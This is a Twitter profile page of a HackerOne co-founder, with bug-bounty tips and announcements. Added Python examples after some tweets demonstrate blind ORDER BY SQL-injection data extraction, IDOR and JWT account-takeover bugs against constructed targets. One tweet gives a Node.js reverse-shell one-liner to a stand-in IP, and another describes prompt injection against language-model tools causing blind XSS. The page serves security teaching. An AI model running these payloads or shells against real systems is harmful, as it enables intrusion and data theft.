Jobert Abma Profile
Jobert Abma

@jobertabma

42,497
Followers
757
Following
495
Media
14,724
Statuses

I tweet about security and my experience as a hacker. Co-founder of HackerOne ( @Hacker0x01 ).

San Francisco, CA
Joined May 2009
Pinned Tweet
@jobertabma
Jobert Abma
5 years
Hackers, I've built a small game that helps improve your XSS skills! It dynamically generates (increasingly more difficult) levels for you to exploit XSS vulnerabilities. No level is the same. Let me know what you think. Happy hacking! #TogetherWeHitHarder
81
1K
3K
@jobertabma
Jobert Abma
4 years
Hackers, I wrote a new tool called Transformations — it’ll help you understand how input is transformed on a system, which can help you craft better payloads. It’s available at . Code at . Happy crafting! #HackForGood
27
583
2K
@jobertabma
Jobert Abma
3 years
In April, I submitted 0 vulnerabilities to 0 programs on @Hacker0x01 and became father of 1 daughter. #TogetherWeHitHarder
91
1
855
@jobertabma
Jobert Abma
4 years
Hackers, for the next 12 hours I’m going to run an experiment: you tell me which vulnerability class you want to learn more about and I will write vulnerable code so you can run and exploit it locally. Tweet me the vuln type and I’ll add code to a repository. #TogetherWeHitHarder
121
200
811
@jobertabma
Jobert Abma
6 years
Hackers, here's a brain dump to help you understand my general (post-recon) application security testing methodology and how I find high / critical vulnerabilities. This is how I demonstrate the value as a hacker. 💰 Ask me anything. #TogetherWeHitHarder
33
282
778
@jobertabma
Jobert Abma
2 years
Me explaining why my vulnerability is a critical
18
81
671
@jobertabma
Jobert Abma
3 years
Lord give me the confidence of a hacker who just found their first server banner disclosure and already added “InfoSec expert” to their LinkedIn.
22
61
600
@jobertabma
Jobert Abma
4 years
$100,000,000.00 in bounties for the hacker community. What an amazing achievement of hackers all around the world. And y’all are just getting started! The future will bring even more opportunity to contribute to a safer internet. 👏👏👏 #HackerOneHits100
21
61
546
@jobertabma
Jobert Abma
3 years
What is your favorite security vulnerability or writeup that was disclosed in 2021? Let’s create a 🧵 with the best, coolest, weirdest, most impressive reports from this year!
36
164
528
@jobertabma
Jobert Abma
7 years
This is how I sometimes feel chaining multiple vulnerabilities to get to high/critical severity.
20
169
497
@jobertabma
Jobert Abma
5 years
Hackers, join me in congratulating @santi_lopezz99 , @bugbountyhq , @fransrosen , @nnwakelam , @ngalongc , and @thedawgyg for all hitting $1,000,000 USD on @Hacker0x01 ! They're role models for all of us. Together we're building an amazing community that made this possible. ❤️
20
51
460
@jobertabma
Jobert Abma
1 year
I’m giving away a Burp Suite Pro license! A Pro license auto renewed and the hacker that I personally sponsored makes enough money from @Hacker0x01 to afford it themselves 🎊 Mention someone that deserves the license in the replies to this tweet and I’ll pick someone in 24h.
323
78
467
@jobertabma
Jobert Abma
3 years
10
43
460
@jobertabma
Jobert Abma
5 years
Hackers, with a redesign of the Program Profiles, we’ve also released a new feature: download @Burp_Suite Project files. It enables you to import a Program scope into Burp. No need to manually set up scope in Burp anymore. You can find it at the bottom of a Scope. Happy hacking!
20
111
454
@jobertabma
Jobert Abma
5 years
Hackers, today we’re announcing our Series D funding! This round brings us to over $110,000,000 USD invested since the company was founded. I wanted to take a moment to reflect on how you, the hacker community, have enabled us on our journey. Small story👇!
20
45
455
@jobertabma
Jobert Abma
4 years
Hackers, I released a new version of Transformations today. You now don’t have to think about the output anymore; simply paste in the entire HTTP response and it’ll detect transformations in it. @_nwodtuhs added Docker support (first PR, thanks!).
8
102
440
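The two Transformations tweets above (the original tool and the update that detects transformations straight from a pasted HTTP response) describe the idea; the link to the tool is not on this page. As an added example, not the tool's own code, here is the core technique in Python: submit a canary whose every candidate encoding is distinct, then look for each encoding of it in the response, including two-step chains such as HTML-escape followed by URL-encode. The canary, the list of candidate transformations and the sample response are all constructed for the example.

```python
import base64
import html
import itertools
import json
import urllib.parse

# Canary submitted to the application.  Chosen so that every transformation
# below produces a distinct string: mixed case, a space, and the characters
# that matter for injection payloads.
CANARY = "Zq'\"<Kx> &zB"

# Candidate transformations a server might apply before reflecting input.
TRANSFORMS = {
    "verbatim": lambda s: s,
    "html-escaped": lambda s: html.escape(s, quote=True),
    "html-escaped-no-quotes": lambda s: html.escape(s, quote=False),
    "url-encoded": lambda s: urllib.parse.quote(s, safe=""),
    "url-encoded-plus": lambda s: urllib.parse.quote_plus(s),
    "json-escaped": lambda s: json.dumps(s)[1:-1],
    "base64": lambda s: base64.b64encode(s.encode()).decode(),
    "uppercased": lambda s: s.upper(),
    "lowercased": lambda s: s.lower(),
    "whitespace-stripped": lambda s: "".join(s.split()),
    "angle-brackets-stripped": lambda s: s.replace("<", "").replace(">", ""),
}


def detect_transformations(response, canary=CANARY):
    """Names of the transformations whose output for `canary` occurs in
    `response`.  Two-step chains are reported as "first -> second"."""
    singles = {name: fn(canary) for name, fn in TRANSFORMS.items()}
    found = [name for name, out in singles.items() if out in response]

    # Chains such as HTML-escape followed by URL-encode.  A chain is only
    # reported when both steps actually changed the string, so it never
    # merely duplicates a single-step hit.
    real = [name for name in TRANSFORMS if name != "verbatim"]
    for first, second in itertools.permutations(real, 2):
        mid = singles[first]
        out = TRANSFORMS[second](mid)
        if out != mid and out != singles[second] and out in response:
            found.append(f"{first} -> {second}")
    return found


# Constructed sample: the canary was sent as a search term and is reflected
# twice, once inside an attribute value and once inside a link.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
    '<input name="q" value="Zq&#x27;&quot;&lt;Kx&gt; &amp;zB">\n'
    '<a href="/search?q=Zq%27%22%3CKx%3E%20%26zB">search again</a>\n'
)

if __name__ == "__main__":
    for hit in detect_transformations(SAMPLE_RESPONSE):
        print(hit)
```

Run against the constructed response it reports html-escaped and url-encoded, one per reflection point, which is what tells you that a payload for the attribute context must survive HTML entity encoding while a payload for the link must survive percent-encoding. Adding a transformation is one more entry in the table.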
@jobertabma
Jobert Abma
7 years
New tool: recon.sh! Hackers lose their recon data all the time or have multiple ways to track it, so here's a tool to track and organize it all in a git repository (it even includes search!). Think of all the productivity gains! #TogetherWeHitHarder
6
194
435
@jobertabma
Jobert Abma
5 years
Two months ago I found three minor bugs that led to an attacker being able to access confidential data and me getting a $12,000 bounty. It’s a rather long read, but if you want to see what I found: ! #TogetherWeHitHarder
4
107
410
@jobertabma
Jobert Abma
7 years
Hackers, if you ever need to spawn a reverse shell in Node.js context: require('child_process').exec('bash -i >& /dev/tcp/1.2.3.4/80 0>&1');. Requires a listener, like nc -lnvvkp 80, on the remote machine.
4
161
398
@jobertabma
Jobert Abma
6 years
Hackers, minor cool insight that I gained some time ago and found a vulnerability with: when you're looking at an asset that may use a microservices architecture, look for IDOR vulnerabilities using path traversal. E.g. https://example/?id=1/../2. See thread. #TogetherWeHitHarder
7
145
387
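The mechanism behind the tip above, as an added example (not code from the tweet's thread): a public gateway authorizes a request by parsing the id leniently, the way Ruby's String#to_i or PHP's intval() turn "1/../2" into 1, and then forwards the raw string into the URL of an internal microservice. The internal service, or the HTTP client in between, resolves the dot segments, so the record that was authorized is not the record that is fetched. The record store, the internal hostname users-svc.internal and the strict fix are all constructed for the example.

```python
import posixpath
import re
from urllib.parse import urlsplit

# Constructed records held by the internal users microservice.
BACKEND_RECORDS = {
    1: {"owner": "alice", "ssn_last4": "1111"},
    2: {"owner": "bob", "ssn_last4": "2222"},
}
USERS_SVC = "http://users-svc.internal"  # hypothetical internal host


def lenient_int(value):
    """Parse the way Ruby's String#to_i or PHP's intval() does: leading
    digits only, so "1/../2" becomes 1.  This is what lets the
    authorization check below pass for a traversal payload."""
    m = re.match(r"\s*(\d+)", value)
    return int(m.group(1)) if m else 0


def backend_get(url):
    """The microservice.  It trusts the gateway and does no authorization.
    Dot segments are resolved as any HTTP client or proxy would
    (RFC 3986 section 5.2.4), so /users/1/../2 is served as /users/2."""
    path = posixpath.normpath(urlsplit(url).path)
    m = re.fullmatch(r"/users/(\d+)", path)
    if not m:
        raise LookupError(path)
    return BACKEND_RECORDS[int(m.group(1))]


def gateway_vulnerable(current_user, raw_id):
    """Public API: authorizes on the leniently parsed id, then forwards the
    *raw* id inside the backend URL."""
    record = BACKEND_RECORDS.get(lenient_int(raw_id))
    if record is None or record["owner"] != current_user:
        raise PermissionError(raw_id)
    return backend_get(f"{USERS_SVC}/users/{raw_id}")


def is_valid_id(raw_id):
    """Strict allow-list: the id must be digits and nothing else."""
    return re.fullmatch(r"\d+", raw_id) is not None


def gateway_fixed(current_user, raw_id):
    """Validates strictly and forwards the parsed integer, never the raw
    string, so what was authorized is what gets fetched."""
    if not is_valid_id(raw_id):
        raise ValueError(raw_id)
    record_id = int(raw_id)
    record = BACKEND_RECORDS.get(record_id)
    if record is None or record["owner"] != current_user:
        raise PermissionError(raw_id)
    return backend_get(f"{USERS_SVC}/users/{record_id}")


if __name__ == "__main__":
    # alice is only allowed to read record 1, yet receives bob's record 2.
    print(gateway_vulnerable("alice", "1/../2"))
```

When testing, the tell is a response for a different object than the one the id "obviously" names; when fixing, validate the id against an allow-list and build the internal URL from the parsed value, not from the request string.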
@jobertabma
Jobert Abma
7 years
Hackers, did you find a SQL injection in an ORDER BY clause and you're unable to guess the column names? Use CASE WHEN <query> THEN RAND() ELSE 1 END to extract data. It'll randomize the order when <query> evaluates to true and remain static when false. #TogetherWeHitHarder
4
128
385
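The ORDER BY trick above, carried through end to end as an added example (my own code, not from the tweet). The target is a constructed in-memory SQLite database; SQLite spells MySQL's RAND() as random(), which is the only change to the payload. The sort parameter is interpolated because a column name cannot be a bound parameter, the usual reason this class of injection survives code review. The oracle issues the same request a few times and treats a changing order as "true", then recovers the admin's API key one character at a time.

```python
import sqlite3
import string

# Constructed target: one admin whose API key the attacker wants.
API_KEY = "h4ck"


def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, api_key TEXT);
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, price REAL);
    """)
    db.execute("INSERT INTO users VALUES (1, 'admin', ?)", (API_KEY,))
    db.executemany("INSERT INTO products(name, price) VALUES (?, ?)",
                   [(f"item-{i}", i * 1.5) for i in range(8)])
    return db


def list_products(db, sort):
    """The vulnerable endpoint.  A column name cannot be a bound parameter,
    so the sort value ends up interpolated into ORDER BY."""
    query = f"SELECT name FROM products ORDER BY {sort}"
    return [row[0] for row in db.execute(query)]


def condition_is_true(db, condition, rounds=5):
    """Boolean oracle.  When `condition` holds the sort key is random()
    (SQLite's spelling of MySQL's RAND()) and the order changes between
    requests; otherwise the key is the constant 1 and the order is stable."""
    payload = f"CASE WHEN ({condition}) THEN random() ELSE 1 END"
    first = list_products(db, payload)
    return any(list_products(db, payload) != first for _ in range(rounds - 1))


def extract_api_key(db, user_id=1,
                    charset=string.ascii_lowercase + string.digits, max_len=64):
    """Recover users.api_key one character at a time through the oracle."""
    target = f"(SELECT api_key FROM users WHERE id = {user_id})"
    found = ""
    for pos in range(1, max_len + 1):
        if not condition_is_true(db, f"length({target}) >= {pos}"):
            break  # no character at this position: the key is complete
        for ch in charset:
            if condition_is_true(db, f"substr({target}, {pos}, 1) = '{ch}'"):
                found += ch
                break
        else:
            raise ValueError(f"no character in the charset matched at position {pos}")
    return found


if __name__ == "__main__":
    db = build_db()
    print(extract_api_key(db))
```

Five requests per question is plenty with eight rows (the chance that random orderings of eight rows coincide four times is negligible); with only two or three rows, raise `rounds`. The same oracle works for a length check, which is how the loop knows when to stop.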
@jobertabma
Jobert Abma
5 years
Hacker tip: when you’re looking for IDORs in a model that references another model, try storing IDs that don’t exist yet. I’ve seen a number of times now that, because the model can’t be found, the system will save the ID. (1/2) #TogetherWeHitHarder
5
99
384
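What that looks like in code, as an added example (constructed, not taken from any report): the ownership check on a referenced attachment only runs when the lookup finds something, so a dangling reference to an id that does not exist yet is saved without any check. With sequential ids, the next upload by anyone receives exactly that id, and the attacker's own report now renders it. The in-memory store, the attach and render operations and the fixed variant are all assumptions of the example.

```python
class Store:
    """Constructed in-memory stand-in for the application's database.
    Attachment ids are sequential, as auto-increment keys usually are."""

    def __init__(self):
        self.attachments = {}   # id -> {"owner": ..., "data": ...}
        self.reports = {}       # id -> {"owner": ..., "attachment_id": ...}
        self.next_attachment_id = 1
        self.next_report_id = 1

    def upload(self, owner, data):
        aid = self.next_attachment_id
        self.next_attachment_id += 1
        self.attachments[aid] = {"owner": owner, "data": data}
        return aid

    def create_report(self, owner):
        rid = self.next_report_id
        self.next_report_id += 1
        self.reports[rid] = {"owner": owner, "attachment_id": None}
        return rid

    def attach_vulnerable(self, user, report_id, attachment_id):
        """Ownership is only checked when the referenced attachment exists,
        so an id that does not exist yet is stored unchecked.
        Returns False where a real application would answer 403."""
        attachment = self.attachments.get(attachment_id)
        if attachment is not None and attachment["owner"] != user:
            return False
        self.reports[report_id]["attachment_id"] = attachment_id
        return True

    def attach_fixed(self, user, report_id, attachment_id):
        """A reference is stored only when it resolves to an object the
        user owns; a missing object is a failure, not a pass."""
        attachment = self.attachments.get(attachment_id)
        if attachment is None or attachment["owner"] != user:
            return False
        self.reports[report_id]["attachment_id"] = attachment_id
        return True

    def render_attachment(self, user, report_id):
        """Render the report's attachment for the report's owner.  The
        attachment is not re-authorized here: the reference was
        'checked' when it was stored."""
        report = self.reports[report_id]
        if report["owner"] != user:
            return None
        attachment = self.attachments.get(report["attachment_id"])
        return attachment["data"] if attachment else None


def demo():
    """Attacker stores a dangling reference to id 1; the victim's upload
    then receives id 1 and the attacker's report renders it."""
    store = Store()
    report = store.create_report("attacker")
    store.attach_vulnerable("attacker", report, 1)
    store.upload("victim", "victim-confidential.pdf")
    return store.render_attachment("attacker", report)


if __name__ == "__main__":
    print(demo())
```

The fix is to treat "not found" as a failed check rather than a skipped one; a foreign-key constraint in the database would also have rejected the dangling reference, and re-checking ownership at render time would have limited the damage even with the bug present.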
@jobertabma
Jobert Abma
3 years
Hackers, would you participate in a CTF where you’d learn more about machine learning and exploit vulnerabilities in ML models? If people are eager to learn more about this, I’ll put something together!
@jobertabma
Jobert Abma
3 years
The next big vulnerability class will be letting machine learning models make decisions in an attacker’s favor based on (faulty) inputs. The next big skill will be the ability to reverse engineer those models / infer inputs based on its decisions.
7
16
156
24
44
378
@jobertabma
Jobert Abma
7 years
Found an interesting vulnerability today: encapsulating an existing username in quotes during sign up would generate a JWT token for username without quotes instead of with quotes. Gotta love a clean account takeover!
11
97
361
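A reconstruction of that bug class, as an added example (the real application's code is not on this page): the sign-up uniqueness check compares the raw string, so '"victim"' is not "taken", while the token is issued for the canonicalised username, so its subject is victim. The canonicalisation rule (strip whitespace and surrounding quotes, lowercase), the minimal HS256 JWT and the signing key are assumptions made for the example; the fixed variant canonicalises once and uses that single value everywhere.

```python
import base64
import hashlib
import hmac
import json

SIGNING_KEY = b"demo-signing-key"  # constructed for the example


def _b64url(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def mint_jwt(claims, key=SIGNING_KEY):
    """Minimal HS256 JWT so the token's subject can be inspected."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"},
                                separators=(",", ":")).encode())
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def verified_subject(token, key=SIGNING_KEY):
    """Verify the signature and return the `sub` claim (None if invalid)."""
    header, payload, sig = token.split(".")
    expected = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(_b64url(expected), sig):
        return None
    padded = payload + "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(padded))["sub"]


def canonical(username):
    """The application's canonicalisation, assumed for the example: trim
    whitespace and surrounding quotes, then lowercase."""
    return username.strip().strip("\"'").lower()


class SignupVulnerable:
    """Uniqueness is checked on the raw string, but the token is issued for
    the canonical form: '"victim"' passes the check and yields a token
    whose subject is victim."""

    def __init__(self):
        self.users = {"victim"}

    def sign_up(self, raw_username):
        if raw_username in self.users:
            return None  # "username taken"
        self.users.add(raw_username)
        return mint_jwt({"sub": canonical(raw_username)})


class SignupFixed:
    """Canonicalise once, up front, and use that one value for the
    uniqueness check, the stored record and the token."""

    def __init__(self):
        self.users = {"victim"}

    def sign_up(self, raw_username):
        username = canonical(raw_username)
        if not username or username in self.users:
            return None
        self.users.add(username)
        return mint_jwt({"sub": username})


if __name__ == "__main__":
    token = SignupVulnerable().sign_up('"victim"')
    print(verified_subject(token))  # victim
```

The general check when hunting this: find every place a user-supplied identity string is normalised (trimming, case folding, Unicode normalisation, quote stripping) and ask whether the uniqueness and authorization checks see the same normalised value as the code that issues credentials.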
@jobertabma
Jobert Abma
3 years
H1 concluded its investigation for the log4j vulnerability (CVE-2021-44228) earlier today. 2 assets used a vulnerable version of log4j but were not exploitable. If you can exploit the vulnerability on any H1 assets, we’ll pay up to $25,000 for it through .
2
67
343
@jobertabma
Jobert Abma
4 years
~Four hours into this experiment and so far I've published vulnerable code for (Blind) SQLi, misconfigured CORS, DOM clobbering, RCE, Command Injection, SSRF (and DNS rebind), Deserialize bugs, XSS, and XXE. See . Keep 'm coming!
11
104
333
@jobertabma
Jobert Abma
3 years
Eid Mubarak to all that are celebrating!
29
10
338
@jobertabma
Jobert Abma
5 years
Cookies, credentials, and tokens are manually redacted in @Hacker0x01 comments every single day. Sometimes, people accidentally forget. Because of that we've introduced a new feature that warns you and offers best-effort redaction before you submit. Happy █████████!
7
48
337
@jobertabma
Jobert Abma
4 years
Hackers, at times, a video is worth a 1,000 words. So today, we're launching a nifty feature that allows you to record a PoC from within the platform alongside your report. You can find it in the Report Wizard and Action Picker. Happy reco... uh, hacking! h/t @sovanderpol
11
42
335
@jobertabma
Jobert Abma
7 years
Hackers, instead of looking for all the vulnerability types at once, pick one. Work your way through the attack surface and ONLY look for one thing. This will help you focus and find more. It'll also help you prioritize what you should be learning next. #TogetherWeHitHarder
8
76
318
@jobertabma
Jobert Abma
6 years
Hackers, I wrote down some advice about what you can do when you're stuck hacking: . Thanks for all the great input I got from you last week on the poll! Let me know if you have any other good ideas, happy to add. #TogetherWeHitHarder
11
119
319
@jobertabma
Jobert Abma
1 year
. @Hacker0x01 has rolled out new AI that supports hackers finding the same vulnerability in other H1 customers! Today, we're announcing our first milestone: enabling hackers to find and validate CVEs () at scale. 🧵
8
55
320
@jobertabma
Jobert Abma
4 years
It's Friday night, I'm sipping red wine, and I gave in to my urge to hack. I spent some hours looking for vulnerabilities in our own site. I found a high severity vulnerability and wrote a 1,600 word report about it. I'm on a hackers high right now. I love this.
13
5
319
@jobertabma
Jobert Abma
5 years
Hackers, we’ve reconsidered our stance on the negative effect on your H1 reputation for duplicates of self-closed reports. Going forward, they’ll be reputation neutral. We’ve retroactively applied this change so your reputation and signal might’ve gone up. Happy hacking!
13
39
314
@jobertabma
Jobert Abma
6 years
Hackers, this is something I've been looking forward to: starting today, when you're completing CTFs on Hacker101, you'll be invited to private programs on @Hacker0x01 ! We will continue to launch new, cool CTFs for you to find more flags and hack more!
7
89
304
@jobertabma
Jobert Abma
3 years
Achievement unlocked: I was assigned a CVE for a security vulnerability in… CVE: . When building an internal tool on top of MITRE’s API I read through their code and found a horizontal privilege escalation that granted admin access to other CNAs!
13
27
309
@jobertabma
Jobert Abma
8 years
Hacker tip: always be coding - it'll broaden your perspective on how software is built and teach you new tricks for getting around defenses.
10
62
293
@jobertabma
Jobert Abma
7 years
PSA: met someone who keeps me sane, applauds hacking, and supports my entrepreneurship. I married my best friend! #TogetherWeHitHarder
88
9
279
@jobertabma
Jobert Abma
6 years
Hackers, we have more exciting news: @HackEDU has built so-called "hackboxes" where you can find and exploit the same vulnerabilities as disclosed on the @Hacker0x01 Hacktivity feed. You can now find the same vulnerabilities other hackers once found!
8
113
272
@jobertabma
Jobert Abma
1 year
New: read something interesting in a @Hacker0x01 report that you want to know more of? Select the text and discover similar reports on Hacktivity with ease.
4
27
272
@jobertabma
Jobert Abma
2 years
Two people found a vulnerability that allowed anyone to (un)archive any asset on , they both got $12,500 for it! Root cause: a class inherited from a class that had a similar interface but skipped the authorization check.
6
38
271
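The root cause described above, as an added example (a constructed reconstruction, not HackerOne's code): two base classes expose the same call()/perform() interface, but only one of them runs an authorize() step. A mutation that picks the wrong parent looks correct, type-checks, and archives any asset for anyone. The classes and the audit helper at the end are assumptions of the example.

```python
from dataclasses import dataclass, field


@dataclass
class Asset:
    name: str
    team_members: set = field(default_factory=set)
    archived: bool = False


class Mutation:
    """Base class for user-facing mutations: authorize, then perform."""

    def __init__(self, actor, asset):
        self.actor = actor
        self.asset = asset

    def authorize(self):
        if self.actor not in self.asset.team_members:
            raise PermissionError(f"{self.actor} is not on {self.asset.name}")

    def perform(self):
        raise NotImplementedError

    def call(self):
        self.authorize()
        return self.perform()


class InternalMutation:
    """Same call()/perform() interface, meant for trusted background jobs,
    so there is no authorize() step.  Choosing this base by mistake is
    the whole bug."""

    def __init__(self, actor, asset):
        self.actor = actor
        self.asset = asset

    def perform(self):
        raise NotImplementedError

    def call(self):
        return self.perform()


class ArchiveAssetBuggy(InternalMutation):  # wrong base class
    def perform(self):
        self.asset.archived = True
        return self.asset


class ArchiveAsset(Mutation):  # correct base class
    def perform(self):
        self.asset.archived = True
        return self.asset


def run(mutation_cls, actor, asset):
    """True if the mutation went through, False if authorization denied it."""
    try:
        mutation_cls(actor, asset).call()
        return True
    except PermissionError:
        return False


def audit(exposed_mutations):
    """Regression check: every mutation reachable from the public API must
    descend from the authorizing base class.  Returns the offenders."""
    return [cls.__name__ for cls in exposed_mutations
            if not issubclass(cls, Mutation)]


if __name__ == "__main__":
    outsider = "mallory"
    print(run(ArchiveAssetBuggy, outsider, Asset("prod-api", {"alice"})))  # True
    print(run(ArchiveAsset, outsider, Asset("prod-api", {"alice"})))       # False
    print(audit([ArchiveAssetBuggy, ArchiveAsset]))                        # ['ArchiveAssetBuggy']
```

The audit is the cheap structural guard: run it in the test suite over whatever registry maps public endpoints to mutation classes, so the next class that inherits from the wrong parent fails CI instead of paying out a bounty.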
@jobertabma
Jobert Abma
2 years
👀 @_StaticFlow_ and @Hacker0x01 are up to something. We can detect CWE and vulnerable asset straight from Burp, preparing most of the H1 report for you, enabling you to focus on what you do best: hacking. Should this experiment see the light of day? Let me know! h/t @Burp_Suite
5
36
264
@jobertabma
Jobert Abma
3 years
8
9
263
@jobertabma
Jobert Abma
2 months
Hacker tip: more and more organizations are experimenting and deploying data analysis using language models, often rendering results in a web context. A new attack vector will become blind XSS vulnerabilities through prompt injections. For large blobs of text, I’d suggest you
5
31
264
@jobertabma
Jobert Abma
6 years
In December I found a number bugs in @gitlab , all of which were disclosed today. The team responded swiftly and professionally and is a pleasure to work with. I'll describe each vulnerability in a separate tweet in this thread. Enjoy them and happy hacking! #TogetherWeHitHarder
9
64
253
@jobertabma
Jobert Abma
2 years
This is me trying to convince the security analyst that it *really* is a critical severity vulnerability.
7
25
253
@jobertabma
Jobert Abma
1 year
New: @Hacker0x01 Hacktivity annotations! Publicly disclosed reports are now automatically summarized using AI to make them even easier to consume. Summaries are provided in five languages. Check it out:
14
20
253
@jobertabma
Jobert Abma
3 years
Hackers, we’re getting close to launching HackerOne’s new markdown engine and we need a few beta testers. It has feature parity with the current engine. We’ve been running this for ourselves for some time and are ready for more feedback. Let me know if you want to give it a shot!
85
12
248
@jobertabma
Jobert Abma
2 years
Found my first security vulnerability in a smart contract CTF today! Spent a total of four hours reading up on solidity, smart contract concepts, and blockchain to understand enough to exploit it - super fun and learned a lot. Hope that the CTF will make it into H101 soon!
6
4
245
@jobertabma
Jobert Abma
6 years
Roses are red
Violets are blue
Go spend a bounty
On a dinner for two
#ValentinesDay
9
27
238
@jobertabma
Jobert Abma
1 year
Hackers, the current state and submission date of the original report are now shown for duplicates on @Hacker0x01 . This increases transparency and reduces ambiguity now that report IDs can no longer be used to determine which report was submitted first.
39
15
239
@jobertabma
Jobert Abma
7 years
This picture was taken by me 5 years ago. It was the day we made the first commit to “Core” (). We’re at 32,000 commits right now across all repositories. We’ve grown to over 100 employees, 1000 customers, and 100,000 hackers. Here’s to the next five!
15
24
238
@jobertabma
Jobert Abma
5 years
Father’s day reminds me that my dad was one of the people to encourage @michielprins and me to start our first company. He would’ve been proud of what the hacker community is today and where it is heading. Last photo of the two of us in Muir Woods (2014):
6
3
228
@jobertabma
Jobert Abma
7 years
Stepping up our swag: we now have prototype WiFi-connected hoodies for your H1 account. It interacts when you receive bounties, increase rank, your reports' change state, and which hackathon you're at! Best: they're designed for you to tinker with. #TogetherWeHitHarder
20
26
227
@jobertabma
Jobert Abma
4 years
Hackers, we heard you: transaction fees for high volume bounty receivers can become pretty high, so today we’re announcing Monthly Payouts. It’ll allow you to bundle this months’ earnings into a single transaction. Read more at . #HackForGood
6
19
220
@jobertabma
Jobert Abma
10 months
Today we’re publicly launching the new @Hacker0x01 Hacktivity! It comes with many new filtering capabilities, a more intuitive UI, powerful search, and better performance. Check it out at and let us know what you think!
14
21
216
@jobertabma
Jobert Abma
6 years
It’s a wrap! H1-91832 was such a success! We all had an amazing time in Goa. @v0sx9b rightfully won the MVH belt, he had very cool findings. @Hacker0x01 will be back in India! #TogetherWeHitHarder
8
36
216
@jobertabma
Jobert Abma
5 years
Hackers, we envision your @Hacker0x01 profile to be your online resumé for security. Today, we're releasing a beta version of what that could look like: . Let us know what you'd like to see to make your profiles stand out! #TogetherWeHitHarder
19
25
214
@jobertabma
Jobert Abma
5 years
Finding truly amazing security vulnerabilities comes from knowing a lot about a little, not knowing a little about a lot. Focus your learning. #TogetherWeHitHarder
7
41
212
@jobertabma
Jobert Abma
1 year
New: Report Templates for hackers on @Hacker0x01 , allowing anyone to reduce the time they spend writing reports. Check it out on .
8
17
215
@jobertabma
Jobert Abma
3 years
Hackers, due to inflation, SQL injection example payloads must now be “' OR 1.23='1.23”. @tayloramurphy
4
30
213
@jobertabma
Jobert Abma
4 years
If you’re wondering how SHA-256 works, you should check out . It’s an animation in your terminal explaining every step of the hashing function! The README of the repository is quite informative, too.
1
53
210
@jobertabma
Jobert Abma
2 years
Getting started in bug bounty for me wasn’t easy. I had to start an entire company for it. It’s still not easy to get started, but, with the help of the community, many resources exist today to get going. But most importantly, do it to learn. The success will follow.
7
19
212
@jobertabma
Jobert Abma
7 years
“Hey Jack, photograph me like one of your Indian hackers” #TogetherWeHitHarder
12
5
208
@jobertabma
Jobert Abma
1 year
The teams at @pdiscoveryio and @Hacker0x01 have been working on implementing Nuclei Cloud into H1 to help scale vulnerability detection for hackers and customers. Here’s a sneak peek. Let us know what you think!
9
29
210
@jobertabma
Jobert Abma
1 year
New: encode and decode text straight from @Hacker0x01 ! Users often need to encode/decode payloads from reports in order to reproduce or retest it. Use this feature by selecting text and clicking "Editor". Let us know what you think and what other transformations we should add!
6
20
212
@jobertabma
Jobert Abma
5 years
On November 24, one of our Security Analysts accidentally posted their H1 session cookie to a HackerOne report while reproducing a potential vulnerability. Here is how we handled the incident: ! #TogetherWeHitHarder
10
43
205
@jobertabma
Jobert Abma
3 years
Ten years ago I submitted my first vulnerability to Apple: a universal Cross-Site Scripting vulnerability in WebKit that affected iOS 3! Today, ten years later, finding vulnerabilities is still my passion.
5
0
202
@jobertabma
Jobert Abma
3 years
Hackers, you can now submit reports and programmatically access your account and program data using the new HackerOne hacker API: . We're excited to see the automations you'll build with it! #TogetherWeHitHarder
12
26
203
@jobertabma
Jobert Abma
3 years
Sneak peek: Hackers, your first language may not be the same as the recipient of a vulnerability you’ve submitted on H1. We’re currently building a feature that offers in-app translations that won’t break the structure of a report or comment, in 71 languages! What do you think?
14
18
197
@jobertabma
Jobert Abma
1 year
10 years @Hacker0x01 ! I’m proud of and humbled by the lasting impact we’ve had on so many lives and securing critical infrastructure for all of society with the broader security community. And yet, so much still to achieve and no lack of drive and energy to go pursue it together.
16
7
202
@jobertabma
Jobert Abma
4 years
As an engineer, every time I read a publicly disclosed security vulnerability or hacker tip, my mind can’t stop thinking about what the code must’ve looked like in the backend to have introduced it. Great exercise and frame of reference for when you yourself are writing code!
3
11
197
@jobertabma
Jobert Abma
6 years
Hacker tip: focus on one particular vulnerability type or one feature at a time when looking at an asset. Make notes throughout the process. This helps you go deeper into a stack and to focus. Understanding the app is the way to more severe vulnerabilities. #TogetherWeHitHarder
2
48
192
@jobertabma
Jobert Abma
4 years
Hackers, an often impactful and under highlighted vulnerability is the ability to write a file to an arbitrary location on a remote system. They’re often hard to exploit and detect from the outside. Couple thoughts and tips in this thread that have helped me. #HackForGood
3
37
193
@jobertabma
Jobert Abma
7 months
About 20 years ago I compiled code to learn about buffer overflows. I couldn’t figure out why the exploit wasn’t working. Until I realized that I was running AMD and the shell code was for Intel. It taught me a lot about how computers work. Moral: failure made me a better hacker!
5
12
192
@jobertabma
Jobert Abma
2 months
I just got off the phone with a hacker that got a $100,000 bounty. Here are the top 5 things in their daily routine that helped them achieve this:
1. Wake up at 1:30p
2. 60m meditation
3. 10m microwaving hot pocket
4. 45m waiting for computer to boot
5. right click > view source,
15
11
193
@jobertabma
Jobert Abma
2 years
@mcipekci @Hacker0x01 @martenmickos Bounties that are split with the hackforgood user on H1 will now go to help people in Türkiye and Syria.
3
51
181
@jobertabma
Jobert Abma
4 years
Informative doesn't impact your signal anymore (and more)!
@Hacker0x01
HackerOne
4 years
Hack on. Some fresh enhancements to how your Reputation, Signal & Impact is calculated. Details in the blog 👉
8
11
130
13
9
176
@jobertabma
Jobert Abma
6 years
A hacker sent me a poem and I can't stop laughing:
Jobert can hack
Better than a dozen
But he doesn't come close
To the real Frans Rosen
20
8
186
@jobertabma
Jobert Abma
4 years
I found a bug in ActiveResource that was exploitable on : . It was assigned CVE-2020-8151. Would’ve been a hard bug to find on our systems without having access to internal logging systems.
1
30
182
@jobertabma
Jobert Abma
1 year
